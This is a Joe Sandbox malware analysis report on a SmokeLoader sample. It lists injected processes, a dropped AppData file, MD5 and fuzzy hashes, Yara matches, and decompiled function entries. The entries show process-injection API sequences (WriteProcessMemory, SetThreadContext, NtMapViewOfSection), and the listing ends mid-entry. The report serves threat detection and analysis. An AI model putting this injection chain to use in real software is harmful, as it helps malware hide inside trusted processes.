Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1180000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:35:48
Start date:	27/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:36:07
Start date:	27/05/2024
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff6a0000
File size:	464'384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:36:07
Start date:	27/05/2024
Path:	C:\Users\user\AppData\Roaming\rugtucw
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rugtucw
Imagebase:	0xf90000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:36:08
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x920000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:36:09
Start date:	27/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:36:10
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x920000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:36:12
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x920000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	12:36:13
Start date:	27/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:36:14
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x920000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	12:36:15
Start date:	27/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	12:36:16
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x920000
File size:	2'972'672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	12:36:17
Start date:	27/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 001AD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.520766665.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13035319e03529589ee63bf52323257bafba1a8f54cefb85013494a0193c5cd1
Instruction ID: c9c393583e27a55d99fedf4ebf06d75a38ac75e5871eeca421fea811bf357251
Opcode Fuzzy Hash: 13035319e03529589ee63bf52323257bafba1a8f54cefb85013494a0193c5cd1
Instruction Fuzzy Hash: DB018C7140D7C09FE7134B259D94792BFA8EF53624F1984CBE8858F2A3C2685C49CB72

Function 001AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.520766665.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ed0ca5ac8eb259edd32094977a63011fd73309bc5f77a92202e6770a780821
Instruction ID: 0e5d8ef9f8e28f34912abf40070e9f8118e3fcf1e317b1d6ae31b5a5fc18aa92
Opcode Fuzzy Hash: 72ed0ca5ac8eb259edd32094977a63011fd73309bc5f77a92202e6770a780821
Instruction Fuzzy Hash: A5014770104B40EEF7244A21DD84767BBC8DF42760F18C415FC4A0F682C3798841CAB1

Analysis Process: powershell.exePID: 3620, Parent PID: 3520COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	33.3%
Total number of Nodes:	24
Total number of Limit Nodes:	2

Executed Functions

Function 00455498 Relevance: 3.2, Strings: 2, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 00455D50
H(+, xrefs: 004556D4, 00455808, 0045588C, 00455928, 004559C7, 00455A8B, 00455B1A, 00455CBC, 00455DA0, 00455EB6, 00455F3A, 00455FB7

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID:
String ID: ($H(+
API String ID: 0-2544574499
Opcode ID: 9d088014436b7b8f756df1c9768e80f4ea5ad241f2332e480ca104e905454377
Instruction ID: 84b69e2266de36b1018aefef065b0cdfade0622397e153173968098c9e1234e1
Opcode Fuzzy Hash: 9d088014436b7b8f756df1c9768e80f4ea5ad241f2332e480ca104e905454377
Instruction Fuzzy Hash: 4262B174A00228CFDB65DF65C994BEEB7B2BF89305F1081EAD419A7291DB346E85CF40

Function 004551E8 Relevance: .4, Instructions: 450
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aec9a3d895c77a967512786404b21d6a7285078f5ea164add46213cbf69a8f5
Instruction ID: 283bd6ca81ad1acfcb137b5666e0383f7118ae135bef07f5ba2ea87c4058b426
Opcode Fuzzy Hash: 7aec9a3d895c77a967512786404b21d6a7285078f5ea164add46213cbf69a8f5
Instruction Fuzzy Hash: 6C814D71D0A3988FDB16DF29D8606D9BFB1AF8A300F0580EBD488AB266D7344D85CF55

Function 020C2BCC Relevance: 9.1, Strings: 7, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$&;, xrefs: 020C2C7A
L4#p, xrefs: 020C2E60
X.;, xrefs: 020C2F9B
$&;, xrefs: 020C2C6D
X.;, xrefs: 020C2F8D
L4#p, xrefs: 020C2EC9
L4#p, xrefs: 020C2EBE

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID: $&;$$&;$L4#p$L4#p$L4#p$X.;$X.;
API String ID: 0-3231618936
Opcode ID: c23251a8849a92b3ed113f318b03464ec1d90642dbb01534e9a1102c3b49b594
Instruction ID: d26292537889a532a4d24798ff3cc44377f65ff36d393db3acfbe3cb653347a7
Opcode Fuzzy Hash: c23251a8849a92b3ed113f318b03464ec1d90642dbb01534e9a1102c3b49b594
Instruction Fuzzy Hash: 19B155B5B00348EFDB26CF64C8507AE77E2AF84314F24846EED158B691CB75C941EB91

Function 004570B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00457377

Strings

H;O0, xrefs: 0045711A
H;O0, xrefs: 004570EB

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID: H;O0$H;O0
API String ID: 963392458-4265240742
Opcode ID: d10fb06abc5dcd71d644c48ba781a54700a1bf690732b91c453619b85fcfc55d
Instruction ID: ffc26b0e59917deaf5bab04bb8a3e58e49c4ec6c8f9e93b59d0fe51f5e815f9d
Opcode Fuzzy Hash: d10fb06abc5dcd71d644c48ba781a54700a1bf690732b91c453619b85fcfc55d
Instruction Fuzzy Hash: CCC13870D00219CFDF24CFA4D845BEEBBB1BB45304F0495AAE819B7241DB789A89CF95

Function 00456D18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00456DEB

Strings

H;O0, xrefs: 00456D3A

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: H;O0
API String ID: 3559483778-115525337
Opcode ID: d375ddde9474c5fc8dfa0f096ca965ac789e59729754db8054debceacadf5928
Instruction ID: bdf4fccc363b8cc79ffd9880a97a97131304c88b7fdfcfddb3c792ed35c51cdb
Opcode Fuzzy Hash: d375ddde9474c5fc8dfa0f096ca965ac789e59729754db8054debceacadf5928
Instruction Fuzzy Hash: CE41ABB5D012489FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D779AA45CF64

Function 00456AB9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00456B6F

Strings

H;O0, xrefs: 00456ADF

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID: H;O0
API String ID: 983334009-115525337
Opcode ID: f94d7682af85ea9666e55f5977881603a92d6ad595b4799127a23068bcdecbdf
Instruction ID: 6b5b464746650577518d9c4d1fa9e5a9a480d32e66464ee79d483c4c07aa51be
Opcode Fuzzy Hash: f94d7682af85ea9666e55f5977881603a92d6ad595b4799127a23068bcdecbdf
Instruction Fuzzy Hash: 1141DDB4D002599FDB10CFA9D984AEEFBB0BF49314F24842AE814B7241D7786A49CF54

Function 00456AC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00456B6F

Strings

H;O0, xrefs: 00456ADF

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID: H;O0
API String ID: 983334009-115525337
Opcode ID: ad327f07c1fb256b419ba498022f9b91d33528451cdadda129835ca7f64531ba
Instruction ID: 1d42ae3ae73136bcdf0c9d93dab18919d68bb78b7b276850d2681f4390148fa4
Opcode Fuzzy Hash: ad327f07c1fb256b419ba498022f9b91d33528451cdadda129835ca7f64531ba
Instruction Fuzzy Hash: E641CEB4D00258DFDB10CFA9D984AEEFBB1BF49314F24802AE814B7240D779AA49CF54

Function 004569D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00456A4E

Strings

H;O0, xrefs: 004569EA

Memory Dump Source

Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_450000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID: H;O0
API String ID: 947044025-115525337
Opcode ID: 2c6c8357f780c092936bf0021cb3f1686caee02d17c57137f34762752962a6d4
Instruction ID: 16f080745e9da6583dd7418b3a5f2c7f0da4afc5b85b7a0d2a4ba798ac68cfbe
Opcode Fuzzy Hash: 2c6c8357f780c092936bf0021cb3f1686caee02d17c57137f34762752962a6d4
Instruction Fuzzy Hash: EF31DBB4D00218DFCF10CFA9D884ADEFBB0AB89314F20942AE814B7300C735A905CF98

Function 020C16D0 Relevance: 3.0, Strings: 2, Instructions: 522
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[i, xrefs: 020C17C6
[i, xrefs: 020C17D4

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID: [i$[i
API String ID: 0-731996973
Opcode ID: 55c973e9bd2f79bb1fcfdbe1b1474ddbe25dcc7b0f28642bfcea9f6b474885a6
Instruction ID: 53e2340945680e4e7c31b7440dcce7ca15d42a4d07898bd3180d6ee301121247
Opcode Fuzzy Hash: 55c973e9bd2f79bb1fcfdbe1b1474ddbe25dcc7b0f28642bfcea9f6b474885a6
Instruction Fuzzy Hash: 76022471B04300DFEB269B68845076EFBE2AFC5210F3484AEE44D9B392DB71C946D7A1

Function 020C2BE6 Relevance: 2.6, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$&;, xrefs: 020C2C7A
$&;, xrefs: 020C2C6D

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID: $&;$$&;
API String ID: 0-3277525272
Opcode ID: f6b2806c5fea9815feb22f718d379e126acd6043d0d04d978d8c681dd19b8dab
Instruction ID: 9e6109f6264afa54f15b0725cf3032dbbce3b0056a608c7c0d756eab2673ae93
Opcode Fuzzy Hash: f6b2806c5fea9815feb22f718d379e126acd6043d0d04d978d8c681dd19b8dab
Instruction Fuzzy Hash: BA2190B0A00708DFDB6ACF18C8957AE33E1AB54315F24842EEC118BAA0C7B5C880EB41

Function 020C0F20 Relevance: .3, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94aca230672eca50cf1cf4642ba615391e5f5e3efca14ebdb9824534084c7b3
Instruction ID: 6e877e11d3b9af78a69bdef217da9bb2dafcd5f75fdfb20ed9640a22f3a32342
Opcode Fuzzy Hash: c94aca230672eca50cf1cf4642ba615391e5f5e3efca14ebdb9824534084c7b3
Instruction Fuzzy Hash: 58A145B4704300DBEB269B74845077EB7E2AFC5215F34806ED849DB392DB76C982DBA1

Function 020C0E8F Relevance: .2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fca81961c1e9d486837a9cee7e678eeaada2609ec29379252ea2c01e44ac000
Instruction ID: 5eebdc006254096987cdf18d398b1b8bc5e8d716dce5624771d2062c0712c409
Opcode Fuzzy Hash: 3fca81961c1e9d486837a9cee7e678eeaada2609ec29379252ea2c01e44ac000
Instruction Fuzzy Hash: 475126B4604385DFEB265B20881077EB7F29F81714F35806ED845AB293DB79C982E761

Function 001ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453448881.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682cd6aebf47ce61791a3fdf0b122a39761c2bbaac26f9b3a7d7dea0b0b861e0
Instruction ID: f0f69975a5fa9565a0c56fb0063f378c9eabce57e28c2b90ea9bbd9b0c92066a
Opcode Fuzzy Hash: 682cd6aebf47ce61791a3fdf0b122a39761c2bbaac26f9b3a7d7dea0b0b861e0
Instruction Fuzzy Hash: 1B01F730104780EEE7144E16DC8476BFB98DF41764F1CC455FC480F182C3799941CAB1

Function 001ED006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453448881.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb606be5f2777e7d9f50c75ba2273d69a8eb82ae50e4eca55831e7b78a92e52
Instruction ID: 38026060750264d67ef12b116fe9e2317e2574f38cc325226b6861f9cf3b0434
Opcode Fuzzy Hash: edb606be5f2777e7d9f50c75ba2273d69a8eb82ae50e4eca55831e7b78a92e52
Instruction Fuzzy Hash: 1C014C7100E3C09FD7128B259C94B56BFB4DF43624F1D81DBE8888F1A3C2695948CB72

Function 020C106F Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7e353f8cd4ea430c9aa9efd505b64cb8c891bea8e2ffb6202bd5abb52dd19b
Instruction ID: 5d56fd7bfd702515cb45d9550f7f1873030b8d9167c708d8dd0382f77774e27e
Opcode Fuzzy Hash: 6d7e353f8cd4ea430c9aa9efd505b64cb8c891bea8e2ffb6202bd5abb52dd19b
Instruction Fuzzy Hash: 6101DB74700344EFEF29A7A1945067EF391AF88B51B30806EDD09B7342CB768D41D755

Function 020C270F Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddea32072888d92bd3934888cc993beb20dde4377ec893a76e209200d1f22a06
Instruction ID: ae0a66123b93053215111d413bf1bb94346924a3c6bf1d1dac84f07850d94bd8
Opcode Fuzzy Hash: ddea32072888d92bd3934888cc993beb20dde4377ec893a76e209200d1f22a06
Instruction Fuzzy Hash: 08E0D871744344CFDF6A776094613AD77D16FA2050F2042BECC5097665CB348805D722

Analysis Process: RegAsm.exePID: 3912, Parent PID: 3620COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	46.7%
Total number of Nodes:	60
Total number of Limit Nodes:	1

Executed Functions

Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
